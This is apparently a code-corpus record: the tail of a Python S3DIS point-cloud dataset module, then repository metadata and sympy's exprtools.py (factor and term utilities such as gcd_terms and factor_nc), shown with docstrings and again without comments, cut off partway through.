gt_bboxes_3d = DepthInstance3DBoxes(
gt_bboxes_3d,
box_dim=gt_bboxes_3d.shape[-1],
with_yaw=False,
origin=(0.5, 0.5, 0.5)).convert_to(self.box_mode_3d)
pts_instance_mask_path = osp.join(self.data_root,
info['pts_instance_mask_path'])
pts_semantic_mask_path = osp.join(self.data_root,
info['pts_semantic_mask_path'])
anns_results = dict(
gt_bboxes_3d=gt_bboxes_3d,
gt_labels_3d=gt_labels_3d,
pts_instance_mask_path=pts_instance_mask_path,
pts_semantic_mask_path=pts_semantic_mask_path)
return anns_results
def get_data_info(self, index):
info = self.data_infos[index]
pts_filename = osp.join(self.data_root, info['pts_path'])
input_dict = dict(pts_filename=pts_filename)
if not self.test_mode:
annos = self.get_ann_info(index)
input_dict['ann_info'] = annos
if self.filter_empty_gt and ~(annos['gt_labels_3d'] != -1).any():
return None
return input_dict
def _build_default_pipeline(self):
pipeline = [
dict(
type='LoadPointsFromFile',
coord_type='DEPTH',
shift_height=False,
load_dim=6,
use_dim=[0, 1, 2, 3, 4, 5]),
dict(
type='DefaultFormatBundle3D',
class_names=self.CLASSES,
with_label=False),
dict(type='Collect3D', keys=['points'])
]
return Compose(pipeline)
def show(self, results, out_dir, show=True, pipeline=None):
assert out_dir is not None, 'Expect out_dir, got none.'
pipeline = self._get_pipeline(pipeline)
for i, result in enumerate(results):
data_info = self.data_infos[i]
pts_path = data_info['pts_path']
file_name = osp.split(pts_path)[-1].split('.')[0]
points = self._extract_data(i, pipeline, 'points').numpy()
gt_bboxes = self.get_ann_info(i)['gt_bboxes_3d']
gt_bboxes = gt_bboxes.corners.numpy() if len(gt_bboxes) else None
gt_labels = self.get_ann_info(i)['gt_labels_3d']
pred_bboxes = result['boxes_3d']
pred_bboxes = pred_bboxes.corners.numpy() if len(pred_bboxes) else None
pred_labels = result['labels_3d']
show_result(points, gt_bboxes, gt_labels,
pred_bboxes, pred_labels, out_dir, file_name, False)
class _S3DISSegDataset(Custom3DSegDataset):
CLASSES = ('ceiling', 'floor', 'wall', 'beam', 'column', 'window', 'door',
'table', 'chair', 'sofa', 'bookcase', 'board', 'clutter')
VALID_CLASS_IDS = tuple(range(13))
ALL_CLASS_IDS = tuple(range(14))
PALETTE = [[0, 255, 0], [0, 0, 255], [0, 255, 255], [255, 255, 0],
[255, 0, 255], [100, 100, 255], [200, 200, 100],
[170, 120, 200], [255, 0, 0], [200, 100, 100], [10, 200, 100],
[200, 200, 200], [50, 50, 50]]
def __init__(self,
data_root,
ann_file,
pipeline=None,
classes=None,
palette=None,
modality=None,
test_mode=False,
ignore_index=None,
scene_idxs=None):
super().__init__(
data_root=data_root,
ann_file=ann_file,
pipeline=pipeline,
classes=classes,
palette=palette,
modality=modality,
test_mode=test_mode,
ignore_index=ignore_index,
scene_idxs=scene_idxs)
def get_ann_info(self, index):
info = self.data_infos[index]
pts_semantic_mask_path = osp.join(self.data_root,
info['pts_semantic_mask_path'])
anns_results = dict(pts_semantic_mask_path=pts_semantic_mask_path)
return anns_results
def _build_default_pipeline(self):
pipeline = [
dict(
type='LoadPointsFromFile',
coord_type='DEPTH',
shift_height=False,
use_color=True,
load_dim=6,
use_dim=[0, 1, 2, 3, 4, 5]),
dict(
type='LoadAnnotations3D',
with_bbox_3d=False,
with_label_3d=False,
with_mask_3d=False,
with_seg_3d=True),
dict(
type='PointSegClassMapping',
valid_cat_ids=self.VALID_CLASS_IDS,
max_cat_id=np.max(self.ALL_CLASS_IDS)),
dict(
type='DefaultFormatBundle3D',
with_label=False,
class_names=self.CLASSES),
dict(type='Collect3D', keys=['points', 'pts_semantic_mask'])
]
return Compose(pipeline)
def show(self, results, out_dir, show=True, pipeline=None):
assert out_dir is not None, 'Expect out_dir, got none.'
pipeline = self._get_pipeline(pipeline)
for i, result in enumerate(results):
data_info = self.data_infos[i]
pts_path = data_info['pts_path']
file_name = osp.split(pts_path)[-1].split('.')[0]
points, gt_sem_mask = self._extract_data(
i, pipeline, ['points', 'pts_semantic_mask'], load_annos=True)
points = points.numpy()
pred_sem_mask = result['semantic_mask'].numpy()
show_seg_result(points, gt_sem_mask,
pred_sem_mask, out_dir, file_name,
np.array(self.PALETTE), self.ignore_index, show)
def get_scene_idxs(self, scene_idxs):
if not self.test_mode and scene_idxs is None:
raise NotImplementedError(
'please provide re-sampled scene indexes for training')
return super().get_scene_idxs(scene_idxs)
@DATASETS.register_module()
@SEG_DATASETS.register_module()
class S3DISSegDataset(_S3DISSegDataset):
def __init__(self,
data_root,
ann_files,
pipeline=None,
classes=None,
palette=None,
modality=None,
test_mode=False,
ignore_index=None,
scene_idxs=None):
ann_files = self._check_ann_files(ann_files)
scene_idxs = self._check_scene_idxs(scene_idxs, len(ann_files))
super().__init__(
data_root=data_root,
ann_file=ann_files[0],
pipeline=pipeline,
classes=classes,
palette=palette,
modality=modality,
test_mode=test_mode,
ignore_index=ignore_index,
scene_idxs=scene_idxs[0])
datasets = [
_S3DISSegDataset(
data_root=data_root,
ann_file=ann_files[i],
pipeline=pipeline,
classes=classes,
palette=palette,
modality=modality,
test_mode=test_mode,
ignore_index=ignore_index,
scene_idxs=scene_idxs[i]) for i in range(len(ann_files))
]
self.concat_data_infos([dst.data_infos for dst in datasets])
self.concat_scene_idxs([dst.scene_idxs for dst in datasets])
if not self.test_mode:
self._set_group_flag()
def concat_data_infos(self, data_infos):
self.data_infos = [
info for one_data_infos in data_infos for info in one_data_infos
]
def concat_scene_idxs(self, scene_idxs):
self.scene_idxs = np.array([], dtype=np.int32)
offset = 0
for one_scene_idxs in scene_idxs:
self.scene_idxs = np.concatenate(
[self.scene_idxs, one_scene_idxs + offset]).astype(np.int32)
offset = np.unique(self.scene_idxs).max() + 1
@staticmethod
def _duplicate_to_list(x, num):
return [x for _ in range(num)]
def _check_ann_files(self, ann_file):
if not isinstance(ann_file, (list, tuple)):
ann_file = self._duplicate_to_list(ann_file, 1)
return ann_file
def _check_scene_idxs(self, scene_idx, num):
if scene_idx is None:
return self._duplicate_to_list(scene_idx, num)
if isinstance(scene_idx, str):
return self._duplicate_to_list(scene_idx, num)
if isinstance(scene_idx[0], str):
return scene_idx
if isinstance(scene_idx[0], (list, tuple, np.ndarray)):
return scene_idx
return self._duplicate_to_list(scene_idx, num)
| true
| true
|
f70b5f2e5d711c4d49dfaaaa08f666f717f97bdc
| 23,143
|
py
|
Python
|
sympy/core/exprtools.py
|
goodok/sympy
|
de84ed2139125a755ea7b6ba91d945d9fbbe5ed9
|
[
"BSD-3-Clause"
] | 2
|
2015-05-11T12:26:38.000Z
|
2016-08-19T00:11:03.000Z
|
sympy/core/exprtools.py
|
goodok/sympy
|
de84ed2139125a755ea7b6ba91d945d9fbbe5ed9
|
[
"BSD-3-Clause"
] | null | null | null |
sympy/core/exprtools.py
|
goodok/sympy
|
de84ed2139125a755ea7b6ba91d945d9fbbe5ed9
|
[
"BSD-3-Clause"
] | null | null | null |
"""Tools for manipulating of large commutative expressions. """
from sympy.core.add import Add
from sympy.core.compatibility import iterable
from sympy.core.mul import Mul, _keep_coeff
from sympy.core.power import Pow
from sympy.core.basic import Basic
from sympy.core.expr import Expr
from sympy.core.function import expand_mul
from sympy.core.sympify import sympify
from sympy.core.numbers import Rational, Integer
from sympy.core.singleton import S
from sympy.core.symbol import Dummy
from sympy.core.coreerrors import NonCommutativeExpression
from sympy.core.containers import Tuple
from sympy.utilities import default_sort_key
from sympy.utilities.iterables import (common_prefix, common_suffix,
preorder_traversal, variations)
def decompose_power(expr):
"""
Decompose power into symbolic base and integer exponent.
Examples
========
>>> from sympy.core.exprtools import decompose_power
>>> from sympy.abc import x, y
>>> decompose_power(x)
(x, 1)
>>> decompose_power(x**2)
(x, 2)
>>> decompose_power(x**(2*y))
(x**y, 2)
>>> decompose_power(x**(2*y/3))
(x**(y/3), 2)
"""
base, exp = expr.as_base_exp()
if exp.is_Number:
if exp.is_Rational:
if not exp.is_Integer:
base = Pow(base, Rational(1, exp.q))
exp = exp.p
else:
base, exp = expr, 1
else:
exp, tail = exp.as_coeff_Mul(rational=True)
if exp is S.NegativeOne:
base, exp = Pow(base, tail), -1
elif exp is not S.One:
tail = _keep_coeff(Rational(1, exp.q), tail)
base, exp = Pow(base, tail), exp.p
else:
base, exp = expr, 1
return base, exp
class Factors(object):
"""Efficient representation of ``f_1*f_2*...*f_n``. """
__slots__ = ['factors', 'gens']
def __init__(self, factors=None):
if factors is None:
factors = {}
self.factors = factors
self.gens = frozenset(factors.keys())
def __hash__(self):
return hash((tuple(self.factors), self.gens))
def __repr__(self):
return "Factors(%s)" % self.factors
def as_expr(self):
args = []
for factor, exp in self.factors.iteritems():
if exp != 1:
b, e = factor.as_base_exp()
e = _keep_coeff(Integer(exp), e)
args.append(b**e)
else:
args.append(factor)
return Mul(*args)
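# Illustrative example (an assumption, mirroring the doctest style used
# elsewhere in this module):
#
#   >>> from sympy.abc import x, y
#   >>> Factors({x: 2, y: -1}).as_expr()
#   x**2/y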
def normal(self, other):
self_factors = dict(self.factors)
other_factors = dict(other.factors)
for factor, self_exp in self.factors.iteritems():
try:
other_exp = other.factors[factor]
except KeyError:
continue
exp = self_exp - other_exp
if not exp:
del self_factors[factor]
del other_factors[factor]
else:
if exp > 0:
self_factors[factor] = exp
del other_factors[factor]
else:
del self_factors[factor]
other_factors[factor] = -exp
return Factors(self_factors), Factors(other_factors)
def mul(self, other):
factors = dict(self.factors)
for factor, exp in other.factors.iteritems():
if factor in factors:
exp = factors[factor] + exp
if not exp:
del factors[factor]
continue
factors[factor] = exp
return Factors(factors)
def div(self, other):
quo, rem = dict(self.factors), {}
for factor, exp in other.factors.iteritems():
if factor in quo:
exp = quo[factor] - exp
if exp <= 0:
del quo[factor]
if exp >= 0:
if exp:
quo[factor] = exp
continue
exp = -exp
rem[factor] = exp
return Factors(quo), Factors(rem)
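# Illustrative division example (an assumption, doctest-style): the common
# part of the exponents cancels and any excess on the divisor side ends up
# in the remainder:
#
#   >>> from sympy.abc import x, y
#   >>> quo, rem = Factors({x: 2, y: 1}).div(Factors({x: 3}))
#   >>> quo.as_expr(), rem.as_expr()
#   (y, x)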
def quo(self, other):
return self.div(other)[0]
def rem(self, other):
return self.div(other)[1]
def pow(self, other):
if type(other) is int and other >= 0:
factors = {}
if other:
for factor, exp in self.factors.iteritems():
factors[factor] = exp*other
return Factors(factors)
else:
raise ValueError("expected non-negative integer, got %s" % other)
def gcd(self, other):
factors = {}
for factor, exp in self.factors.iteritems():
if factor in other.factors:
exp = min(exp, other.factors[factor])
factors[factor] = exp
return Factors(factors)
def lcm(self, other):
factors = dict(self.factors)
for factor, exp in other.factors.iteritems():
if factor in factors:
exp = max(exp, factors[factor])
factors[factor] = exp
return Factors(factors)
def __mul__(self, other):
if isinstance(other, Factors):
return self.mul(other)
else:
return NotImplemented
def __divmod__(self, other):
if isinstance(other, Factors):
return self.div(other)
else:
return NotImplemented
def __div__(self, other):
if isinstance(other, Factors):
return self.quo(other)
else:
return NotImplemented
__truediv__ = __div__
def __mod__(self, other):
if isinstance(other, Factors):
return self.rem(other)
else:
return NotImplemented
def __pow__(self, other):
if type(other) is int:
return self.pow(other)
else:
return NotImplemented
def __eq__(self, other):
return self.factors == other.factors
def __ne__(self, other):
return not self.__eq__(other)
class Term(object):
"""Efficient representation of ``coeff*(numer/denom)``. """
__slots__ = ['coeff', 'numer', 'denom']
def __init__(self, term, numer=None, denom=None):
if numer is None and denom is None:
if not term.is_commutative:
raise NonCommutativeExpression('commutative expression expected')
coeff, factors = term.as_coeff_mul()
numer, denom = {}, {}
for factor in factors:
base, exp = decompose_power(factor)
if base.is_Add:
cont, base = base.primitive()
coeff *= cont**exp
if exp > 0:
numer[base] = exp
else:
denom[base] = -exp
numer = Factors(numer)
denom = Factors(denom)
else:
coeff = term
if numer is None:
numer = Factors()
if denom is None:
denom = Factors()
self.coeff = coeff
self.numer = numer
self.denom = denom
def __hash__(self):
return hash((self.coeff, self.numer, self.denom))
def __repr__(self):
return "Term(%s, %s, %s)" % (self.coeff, self.numer, self.denom)
def as_expr(self):
return self.coeff*(self.numer.as_expr()/self.denom.as_expr())
def mul(self, other):
coeff = self.coeff*other.coeff
numer = self.numer.mul(other.numer)
denom = self.denom.mul(other.denom)
numer, denom = numer.normal(denom)
return Term(coeff, numer, denom)
def inv(self):
return Term(1/self.coeff, self.denom, self.numer)
def quo(self, other):
return self.mul(other.inv())
def pow(self, other):
if other < 0:
return self.inv().pow(-other)
else:
return Term(self.coeff ** other,
self.numer.pow(other),
self.denom.pow(other))
def gcd(self, other):
return Term(self.coeff.gcd(other.coeff),
self.numer.gcd(other.numer),
self.denom.gcd(other.denom))
def lcm(self, other):
return Term(self.coeff.lcm(other.coeff),
self.numer.lcm(other.numer),
self.denom.lcm(other.denom))
def __mul__(self, other):
if isinstance(other, Term):
return self.mul(other)
else:
return NotImplemented
def __div__(self, other):
if isinstance(other, Term):
return self.quo(other)
else:
return NotImplemented
__truediv__ = __div__
def __pow__(self, other):
if type(other) is int:
return self.pow(other)
else:
return NotImplemented
def __eq__(self, other):
return (self.coeff == other.coeff and
self.numer == other.numer and
self.denom == other.denom)
def __ne__(self, other):
return not self.__eq__(other)
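# Illustrative example (an assumption, doctest-style): the coefficient is
# split off and the remaining factors are sorted into numerator/denominator:
#
#   >>> from sympy.abc import x, y
#   >>> t = Term(3*x/(2*y))
#   >>> t.coeff, t.numer.as_expr(), t.denom.as_expr()
#   (3/2, x, y)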
def _gcd_terms(terms, isprimitive=False):
"""Helper function for :func:`gcd_terms`. If `isprimitive` is True then the
call to primitive for an Add will be skipped. This is useful when the
content has already been extracted."""
if isinstance(terms, Basic) and not isinstance(terms, Tuple):
terms = Add.make_args(terms)
if len(terms) <= 1:
if not terms:
return S.Zero, S.Zero, S.One
else:
return terms[0], S.One, S.One
terms = map(Term, terms)
cont = terms[0]
for term in terms[1:]:
cont = cont.gcd(term)
for i, term in enumerate(terms):
terms[i] = term.quo(cont)
denom = terms[0].denom
for term in terms[1:]:
denom = denom.lcm(term.denom)
numers = []
for term in terms:
numer = term.numer.mul(denom.quo(term.denom))
numers.append(term.coeff*numer.as_expr())
cont = cont.as_expr()
numer = Add(*numers)
denom = denom.as_expr()
if not isprimitive and numer.is_Add:
_cont, numer = numer.primitive()
cont *= _cont
return cont, numer, denom
def gcd_terms(terms, isprimitive=False, clear=True):
"""
Compute the GCD of ``terms`` and put them together. If ``isprimitive`` is
True the _gcd_terms will not run the primitive method on the terms.
``clear`` controls the removal of integers from the denominator of an Add
expression. When True, all numerical denominators will be cleared; when
False, the denominators will be cleared only if all terms had numerical
denominators.
Examples
========
>>> from sympy.core import gcd_terms
>>> from sympy.abc import x, y
>>> gcd_terms((x + 1)**2*y + (x + 1)*y**2)
y*(x + 1)*(x + y + 1)
>>> gcd_terms(x/2 + 1)
(x + 2)/2
>>> gcd_terms(x/2 + 1, clear=False)
x/2 + 1
>>> gcd_terms(x/2 + y/2, clear=False)
(x + y)/2
"""
def mask(terms):
"""replace nc portions of each term with unique Dummy symbols
and return the replacements to restore them"""
args = [(a, []) if a.is_commutative else a.args_cnc() for a in terms]
reps = []
for i, (c, nc) in enumerate(args):
if nc:
nc = Mul._from_args(nc)
d = Dummy()
reps.append((d, nc))
c.append(d)
args[i] = Mul._from_args(c)
else:
args[i] = c
return args, dict(reps)
terms = sympify(terms)
isexpr = isinstance(terms, Expr)
if not isexpr or terms.is_Add:
if isexpr: # hence an Add
terms = list(terms.args)
terms, reps = mask(terms)
cont, numer, denom = _gcd_terms(terms, isprimitive)
numer = numer.xreplace(reps)
coeff, factors = cont.as_coeff_Mul()
return _keep_coeff(coeff, factors*numer/denom, clear=clear)
if terms.is_Atom:
return terms
if terms.is_Mul:
c, args = terms.as_coeff_mul()
return _keep_coeff(c, Mul(*[gcd_terms(i, isprimitive, clear) for i in args]), clear=clear)
def handle(a):
if iterable(a):
if isinstance(a, Basic):
return a.func(*[gcd_terms(i, isprimitive, clear) for i in a.args])
return type(a)([gcd_terms(i, isprimitive, clear) for i in a])
return gcd_terms(a, isprimitive, clear)
return terms.func(*[handle(i) for i in terms.args])
def factor_terms(expr, radical=False, clear=False):
"""Remove common factors from terms in all arguments without
changing the underlying structure of the expr. No expansion or
simplification (and no processing of non-commutatives) is performed.
If radical=True then a radical common to all terms will be factored
out of any Add sub-expressions of the expr.
If clear=False (default) then coefficients will not be separated
from a single Add if they can be distributed to leave one or more
terms with integer coefficients.
Examples
========
>>> from sympy import factor_terms, Symbol, Mul, primitive
>>> from sympy.abc import x, y
>>> factor_terms(x + x*(2 + 4*y)**3)
x*(8*(2*y + 1)**3 + 1)
>>> A = Symbol('A', commutative=False)
>>> factor_terms(x*A + x*A + x*y*A)
x*(y*A + 2*A)
When clear is False, a fraction will only appear factored out of an
Add expression if all terms of the Add have coefficients that are
fractions:
>>> factor_terms(x/2 + 1, clear=False)
x/2 + 1
>>> factor_terms(x/2 + 1, clear=True)
(x + 2)/2
This only applies when there is a single Add that the coefficient
multiplies:
>>> factor_terms(x*y/2 + y, clear=True)
y*(x + 2)/2
>>> factor_terms(x*y/2 + y, clear=False) == _
True
"""
expr = sympify(expr)
is_iterable = iterable(expr)
if not isinstance(expr, Basic) or expr.is_Atom:
if is_iterable:
return type(expr)([factor_terms(i, radical=radical, clear=clear) for i in expr])
return expr
if expr.is_Pow or expr.is_Function or is_iterable or not hasattr(expr, 'args_cnc'):
args = expr.args
newargs = tuple([factor_terms(i, radical=radical, clear=clear) for i in args])
if newargs == args:
return expr
return expr.func(*newargs)
cont, p = expr.as_content_primitive(radical=radical)
list_args = [gcd_terms(a, isprimitive=True, clear=clear) for a in Add.make_args(p)]
p = Add._from_args(list_args) # gcd_terms will fix up ordering
p = gcd_terms(p, isprimitive=True, clear=clear)
return _keep_coeff(cont, p, clear=clear)
def _mask_nc(eq):
"""Return ``eq`` with non-commutative objects replaced with dummy
symbols. A dictionary that can be used to restore the original
values is returned: if it is None, the expression is
noncommutative and cannot be made commutative. The third value
returned is a list of any non-commutative symbols that appeared
in the equation.
Notes
=====
All commutative objects (other than Symbol) will be replaced;
if the only non-commutative objects are Symbols and there is only
1 Symbol, it will be replaced; if there are more than one then
they will not be replaced; the calling routine should handle
replacements in this case since some care must be taken to keep
track of the ordering of symbols when they occur within Muls.
Examples
========
>>> from sympy.physics.secondquant import Commutator, NO, F, Fd
>>> from sympy import Dummy, symbols
>>> from sympy.abc import x, y
>>> from sympy.core.exprtools import _mask_nc
>>> A, B, C = symbols('A,B,C', commutative=False)
>>> Dummy._count = 0 # reset for doctest purposes
>>> _mask_nc(A**2 - x**2)
(_0**2 - x**2, {_0: A}, [])
>>> _mask_nc(A**2 - B**2)
(A**2 - B**2, None, [A, B])
>>> _mask_nc(1 + x*Commutator(A, B))
(_1*x + 1, {_1: Commutator(A, B)}, [A, B])
>>> _mask_nc(NO(Fd(x)*F(y)))
(_2, {_2: NO(CreateFermion(x)*AnnihilateFermion(y))}, [])
"""
expr = eq
if expr.is_commutative:
return eq, {}, []
# if there is only one nc symbol, it can be factored regularly but
# polys is going to complain, so replace it with a dummy
rep = []
nc_syms = [s for s in expr.free_symbols if not s.is_commutative]
if len(nc_syms) == 1:
nc = Dummy()
rep.append((nc_syms.pop(), nc))
expr = expr.subs(rep)
# even though the noncommutative symbol may be gone, the expression
# might still appear noncommutative; if it's a non-elementary object
# we will replace it, but if it is a Symbol, Add, Mul, Pow we leave
# it alone.
nc_syms.sort(key=default_sort_key)
if nc_syms or not expr.is_commutative:
pot = preorder_traversal(expr)
for i, a in enumerate(pot):
if any(a == r[0] for r in rep):
pass
elif (
not a.is_commutative and
not (a.is_Symbol or a.is_Add or a.is_Mul or a.is_Pow)
):
rep.append((a, Dummy()))
else:
continue # don't skip
pot.skip() # don't go any further
expr = expr.subs(rep)
return expr, dict([(v, k) for k, v in rep]) or None, nc_syms
def factor_nc(expr):
"""Return the factored form of ``expr`` while handling non-commutative
expressions.
    Examples
    ========
>>> from sympy.core.exprtools import factor_nc
>>> from sympy import Symbol
>>> from sympy.abc import x
>>> A = Symbol('A', commutative=False)
>>> B = Symbol('B', commutative=False)
>>> factor_nc((x**2 + 2*A*x + A**2).expand())
(x + A)**2
>>> factor_nc(((x + A)*(x + B)).expand())
(x + A)*(x + B)
"""
from sympy.simplify.simplify import _mexpand
from sympy.polys import gcd, factor
expr = sympify(expr)
if not isinstance(expr, Expr) or not expr.args:
return expr
if not expr.is_Add:
return expr.func(*[factor_nc(a) for a in expr.args])
expr, rep, nc_symbols = _mask_nc(expr)
if rep:
return factor(expr).subs(rep)
else:
args = [a.args_cnc() for a in Add.make_args(expr)]
c = g = l = r = S.One
hit = False
# find any commutative gcd term
for i, a in enumerate(args):
if i == 0:
c = Mul._from_args(a[0])
elif a[0]:
c = gcd(c, Mul._from_args(a[0]))
else:
c = S.One
if c is not S.One:
hit = True
c, g = c.as_coeff_Mul()
for i, (cc, _) in enumerate(args):
cc = list(Mul.make_args(Mul._from_args(list(cc))/g))
args[i][0] = cc
# find any noncommutative common prefix
for i, a in enumerate(args):
if i == 0:
n = a[1][:]
else:
n = common_prefix(n, a[1])
if not n:
# is there a power that can be extracted?
if not args[0][1]:
break
b, e = args[0][1][0].as_base_exp()
ok = False
if e.is_Integer:
for t in args:
if not t[1]:
break
bt, et = t[1][0].as_base_exp()
if et.is_Integer and bt == b:
e = min(e, et)
else:
break
else:
ok = hit = True
l = b**e
il = b**-e
for i, a in enumerate(args):
args[i][1][0] = il*args[i][1][0]
break
if not ok:
break
else:
hit = True
lenn = len(n)
l = Mul(*n)
for i, a in enumerate(args):
args[i][1] = args[i][1][lenn:]
# find any noncommutative common suffix
for i, a in enumerate(args):
if i == 0:
n = a[1][:]
else:
n = common_suffix(n, a[1])
if not n:
# is there a power that can be extracted?
if not args[0][1]:
break
b, e = args[0][1][-1].as_base_exp()
ok = False
if e.is_Integer:
for t in args:
if not t[1]:
break
bt, et = t[1][-1].as_base_exp()
if et.is_Integer and bt == b:
e = min(e, et)
else:
break
else:
ok = hit = True
r = b**e
il = b**-e
for i, a in enumerate(args):
args[i][1][-1] = args[i][1][-1]*il
break
if not ok:
break
else:
hit = True
lenn = len(n)
r = Mul(*n)
for i, a in enumerate(args):
args[i][1] = a[1][:len(a[1]) - lenn]
if hit:
mid = Add(*[Mul(*cc)*Mul(*nc) for cc, nc in args])
else:
mid = expr
# sort the symbols so the Dummys would appear in the same
# order as the original symbols, otherwise you may introduce
        # a factor of -1, e.g. A**2 - B**2 -- {A:y, B:x} --> y**2 - x**2
# and the former factors into two terms, (A - B)*(A + B) while the
# latter factors into 3 terms, (-1)*(x - y)*(x + y)
rep1 = [(n, Dummy()) for n in sorted(nc_symbols, key=default_sort_key)]
unrep1 = [(v, k) for k, v in rep1]
unrep1.reverse()
new_mid, r2, _ = _mask_nc(mid.subs(rep1))
new_mid = factor(new_mid)
new_mid = new_mid.subs(r2).subs(unrep1)
if new_mid.is_Pow:
return _keep_coeff(c, g*l*new_mid*r)
if new_mid.is_Mul:
# XXX TODO there should be a way to inspect what order the terms
# must be in and just select the plausible ordering without
# checking permutations
cfac = []
ncfac = []
for f in new_mid.args:
if f.is_commutative:
cfac.append(f)
else:
b, e = f.as_base_exp()
assert e.is_Integer
ncfac.extend([b]*e)
pre_mid = g*Mul(*cfac)*l
target = _mexpand(expr/c)
for s in variations(ncfac, len(ncfac)):
ok = pre_mid*Mul(*s)*r
if _mexpand(ok) == target:
return _keep_coeff(c, ok)
# mid was an Add that didn't factor successfully
return _keep_coeff(c, g*l*mid*r)
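# A hedged usage sketch (not from the original module): with commutative x and
# non-commutative A, B as in the docstring above, both the commutative gcd and
# a shared non-commutative left factor are extracted:
# >>> factor_nc(x*A*B + 2*x*A)
# x*A*(B + 2)    # x is the commutative gcd, A the common prefix; Add order may vary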
| 31.190027
| 98
| 0.535065
|
from sympy.core.add import Add
from sympy.core.compatibility import iterable
from sympy.core.mul import Mul, _keep_coeff
from sympy.core.power import Pow
from sympy.core.basic import Basic
from sympy.core.expr import Expr
from sympy.core.function import expand_mul
from sympy.core.sympify import sympify
from sympy.core.numbers import Rational, Integer
from sympy.core.singleton import S
from sympy.core.symbol import Dummy
from sympy.core.coreerrors import NonCommutativeExpression
from sympy.core.containers import Tuple
from sympy.utilities import default_sort_key
from sympy.utilities.iterables import (common_prefix, common_suffix,
preorder_traversal, variations)
def decompose_power(expr):
base, exp = expr.as_base_exp()
if exp.is_Number:
if exp.is_Rational:
if not exp.is_Integer:
base = Pow(base, Rational(1, exp.q))
exp = exp.p
else:
base, exp = expr, 1
else:
exp, tail = exp.as_coeff_Mul(rational=True)
if exp is S.NegativeOne:
base, exp = Pow(base, tail), -1
elif exp is not S.One:
tail = _keep_coeff(Rational(1, exp.q), tail)
base, exp = Pow(base, tail), exp.p
else:
base, exp = expr, 1
return base, exp
class Factors(object):
__slots__ = ['factors', 'gens']
def __init__(self, factors=None):
if factors is None:
factors = {}
self.factors = factors
self.gens = frozenset(factors.keys())
def __hash__(self):
return hash((tuple(self.factors), self.gens))
def __repr__(self):
return "Factors(%s)" % self.factors
def as_expr(self):
args = []
for factor, exp in self.factors.iteritems():
if exp != 1:
b, e = factor.as_base_exp()
e = _keep_coeff(Integer(exp), e)
args.append(b**e)
else:
args.append(factor)
return Mul(*args)
def normal(self, other):
self_factors = dict(self.factors)
other_factors = dict(other.factors)
for factor, self_exp in self.factors.iteritems():
try:
other_exp = other.factors[factor]
except KeyError:
continue
exp = self_exp - other_exp
if not exp:
del self_factors[factor]
del other_factors[factor]
else:
if exp > 0:
self_factors[factor] = exp
del other_factors[factor]
else:
del self_factors[factor]
other_factors[factor] = -exp
return Factors(self_factors), Factors(other_factors)
def mul(self, other):
factors = dict(self.factors)
for factor, exp in other.factors.iteritems():
if factor in factors:
exp = factors[factor] + exp
if not exp:
del factors[factor]
continue
factors[factor] = exp
return Factors(factors)
def div(self, other):
quo, rem = dict(self.factors), {}
for factor, exp in other.factors.iteritems():
if factor in quo:
exp = quo[factor] - exp
if exp <= 0:
del quo[factor]
if exp >= 0:
if exp:
quo[factor] = exp
continue
exp = -exp
rem[factor] = exp
return Factors(quo), Factors(rem)
def quo(self, other):
return self.div(other)[0]
def rem(self, other):
return self.div(other)[1]
def pow(self, other):
if type(other) is int and other >= 0:
factors = {}
if other:
for factor, exp in self.factors.iteritems():
factors[factor] = exp*other
return Factors(factors)
else:
raise ValueError("expected non-negative integer, got %s" % other)
def gcd(self, other):
factors = {}
for factor, exp in self.factors.iteritems():
if factor in other.factors:
exp = min(exp, other.factors[factor])
factors[factor] = exp
return Factors(factors)
def lcm(self, other):
factors = dict(self.factors)
for factor, exp in other.factors.iteritems():
if factor in factors:
exp = max(exp, factors[factor])
factors[factor] = exp
return Factors(factors)
def __mul__(self, other):
if isinstance(other, Factors):
return self.mul(other)
else:
return NotImplemented
def __divmod__(self, other):
if isinstance(other, Factors):
return self.div(other)
else:
return NotImplemented
def __div__(self, other):
if isinstance(other, Factors):
return self.quo(other)
else:
return NotImplemented
__truediv__ = __div__
def __mod__(self, other):
if isinstance(other, Factors):
return self.rem(other)
else:
return NotImplemented
def __pow__(self, other):
if type(other) is int:
return self.pow(other)
else:
return NotImplemented
def __eq__(self, other):
return self.factors == other.factors
def __ne__(self, other):
return not self.__eq__(other)
class Term(object):
__slots__ = ['coeff', 'numer', 'denom']
def __init__(self, term, numer=None, denom=None):
if numer is None and denom is None:
if not term.is_commutative:
raise NonCommutativeExpression('commutative expression expected')
coeff, factors = term.as_coeff_mul()
numer, denom = {}, {}
for factor in factors:
base, exp = decompose_power(factor)
if base.is_Add:
cont, base = base.primitive()
coeff *= cont**exp
if exp > 0:
numer[base] = exp
else:
denom[base] = -exp
numer = Factors(numer)
denom = Factors(denom)
else:
coeff = term
if numer is None:
numer = Factors()
if denom is None:
denom = Factors()
self.coeff = coeff
self.numer = numer
self.denom = denom
def __hash__(self):
return hash((self.coeff, self.numer, self.denom))
def __repr__(self):
return "Term(%s, %s, %s)" % (self.coeff, self.numer, self.denom)
def as_expr(self):
return self.coeff*(self.numer.as_expr()/self.denom.as_expr())
def mul(self, other):
coeff = self.coeff*other.coeff
numer = self.numer.mul(other.numer)
denom = self.denom.mul(other.denom)
numer, denom = numer.normal(denom)
return Term(coeff, numer, denom)
def inv(self):
return Term(1/self.coeff, self.denom, self.numer)
def quo(self, other):
return self.mul(other.inv())
def pow(self, other):
if other < 0:
return self.inv().pow(-other)
else:
return Term(self.coeff ** other,
self.numer.pow(other),
self.denom.pow(other))
def gcd(self, other):
return Term(self.coeff.gcd(other.coeff),
self.numer.gcd(other.numer),
self.denom.gcd(other.denom))
def lcm(self, other):
return Term(self.coeff.lcm(other.coeff),
self.numer.lcm(other.numer),
self.denom.lcm(other.denom))
def __mul__(self, other):
if isinstance(other, Term):
return self.mul(other)
else:
return NotImplemented
def __div__(self, other):
if isinstance(other, Term):
return self.quo(other)
else:
return NotImplemented
__truediv__ = __div__
def __pow__(self, other):
if type(other) is int:
return self.pow(other)
else:
return NotImplemented
def __eq__(self, other):
return (self.coeff == other.coeff and
self.numer == other.numer and
self.denom == other.denom)
def __ne__(self, other):
return not self.__eq__(other)
def _gcd_terms(terms, isprimitive=False):
if isinstance(terms, Basic) and not isinstance(terms, Tuple):
terms = Add.make_args(terms)
if len(terms) <= 1:
if not terms:
return S.Zero, S.Zero, S.One
else:
return terms[0], S.One, S.One
terms = map(Term, terms)
cont = terms[0]
for term in terms[1:]:
cont = cont.gcd(term)
for i, term in enumerate(terms):
terms[i] = term.quo(cont)
denom = terms[0].denom
for term in terms[1:]:
denom = denom.lcm(term.denom)
numers = []
for term in terms:
numer = term.numer.mul(denom.quo(term.denom))
